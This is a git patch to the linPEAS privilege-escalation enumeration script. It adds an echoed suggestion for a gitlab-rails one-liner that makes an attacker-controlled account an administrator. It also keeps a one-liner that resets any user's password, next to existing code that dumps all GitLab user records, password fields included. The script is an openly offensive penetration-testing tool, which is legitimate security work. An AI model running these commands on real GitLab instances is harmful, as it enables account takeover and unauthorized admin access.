From ffe6dac82ba924d2de9c24ccdcc2a803dbd4d3b6 Mon Sep 17 00:00:00 2001
From: Cas van Cooten <chvancooten@gmail.com>
Date: Tue, 22 Dec 2020 15:59:12 +0100
Subject: [PATCH] Add opsec-safe privesc suggestion for 'gitlab-rails'

---
 linPEAS/linpeas.sh | 3 ++-
 1 file changed, 2 insertions(+), 1 deletion(-)

diff --git a/linPEAS/linpeas.sh b/linPEAS/linpeas.sh
index 04ea607..0858e71 100755
--- a/linPEAS/linpeas.sh
+++ b/linPEAS/linpeas.sh
@@ -2300,7 +2300,8 @@ if [ "`echo $CHECKS | grep SofI`" ]; then
   if [ "`which gitlab-rails`" ]; then
     echo "gitlab-rails was found. Trying to dump users..."
     gitlab-rails runner 'User.where.not(username: "peasssssssss").each { |u| pp u.attributes }' | sed -E "s,email|password,${C}[1;31m&${C}[0m,"
-    echo "If you have enough privileges, you can change the password of any user running: gitlab-rails runner 'user = User.find_by(email: \"admin@example.com\"); user.password = \"pass_peass_pass\"; user.password_confirmation = \"pass_peass_pass\"; user.save!'"
+    echo "If you have enough privileges, you can make an account under your control administrator by running: gitlab-rails runner 'user = User.find_by(email: \"youruser@example.com\"); user.admin = TRUE; user.save!'"
+    echo "Alternatively, you could change the password of any user by running: gitlab-rails runner 'user = User.find_by(email: \"admin@example.com\"); user.password = \"pass_peass_pass\"; user.password_confirmation = \"pass_peass_pass\"; user.save!'"
     echo ""
   fi
   if [ "`which gitlab-backup`" ]; then